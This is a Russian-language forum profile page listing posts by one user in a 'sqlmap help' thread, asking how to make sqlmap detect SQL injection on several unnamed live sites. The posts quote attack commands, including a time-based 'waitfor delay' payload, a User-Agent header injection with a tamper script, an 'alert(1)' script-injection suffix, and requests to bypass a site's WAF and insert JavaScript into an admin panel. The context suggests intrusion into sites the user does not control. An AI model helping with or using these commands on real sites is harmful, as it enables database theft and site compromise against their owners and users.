Перейти к содержанию

luteraro

Пользователь
  • Публикаций

    10
  • Зарегистрирован

  • Посещение

Репутация

7 Neutral

Информация о luteraro

  • Звание
    Rank №2
  1. Помощь по sqlmap

    Подскажите, как вставить в sqlmap? -u "site.com" --referer="*"
  2. Помощь по sqlmap

    Да, уже увидел что ты знаешь, не посмотрел предыдущие посты, сорри :) У меня просто на днях только вот в таком формате было и проканало. Что пишет то? Ругается на синтаксис или просто скулю не находит? Не находит. Вот допустим есть: 1 waitfor delay'0:0:20'--=1. Делаю: -u "http://site:.com/?*" --prefix="1" --suffix="--=1" Но тоже нет, хотя, по идее, должна быть. Пробую risk/level поднять. --prefix="1" --suffix="--=1" вот это вообще лишнее, должно хватить -u "http://site:.com/?*" --dbs --level=5 --risk=3 можно еще поробовать --technique=T добавить Я пробовал так, не помогает.
  3. Помощь по sqlmap

    Да, уже увидел что ты знаешь, не посмотрел предыдущие посты, сорри :) У меня просто на днях только вот в таком формате было и проканало. Что пишет то? Ругается на синтаксис или просто скулю не находит? Не находит. Вот допустим есть: 1 waitfor delay'0:0:20'--=1. Делаю: -u "http://site:.com/?*" --prefix="1" --suffix="--=1" Но тоже нет, хотя, по идее, должна быть. Пробую risk/level поднять.
  4. Помощь по sqlmap

    Про звездочку я знаю, но только это не помогает. Пробовал risk/level увеличивать -- не помогает.
  5. Помощь по sqlmap

    Еще вопрос. python sqlmap.py -u "site.com/index.php?route=extension/module/smartnotifications/getPopup*" --suffix="17625';alert(1)//138" --threads=10 -v 3 --batch --random-agent --dbs Как сделать, чтобы sqlmap использовал этот пэйлоад - 17625';alert(1)//138? Добавляю --suffix, но в итоге: [18:23:02] [PAYLOAD] extension/module/smartnotifications/getPopup.(,('.".)(17625';alert(1)//138 [18:23:07] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable [18:23:07] [PAYLOAD] extension/module/smartnotifications/getPopup'qSMPVF<'">IveWAQ17625';alert(1)//138 UPD Еще подскажите, пожалуйста, как в sqlmap вставить вот такую инъекцию: Спойлер
  6. Помощь по sqlmap

    Есть несколько сайтов, уязвимость в User-Agent'e. python sqlmap.py -u "http://www.site:.com/page" --headers="User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)* and 8475=8475-- " --level 3 --batch --random-agent --tamper=charencode --threads=10 --dbs Но на этом все закачивается... [WARNING] false positive or unexploitable injection point detected [WARNING] (custom) HEADER parameter 'User-Agent #1*' does not seem to be injectable Можно что-нибудь сделать?
  7. WAF сайта. Мне нужно js вставить.
  8. Можно ли как-то обойти? Нужно в админке вставить тег
  9. Sqlmap кладет шоп

    Не помогло :(
×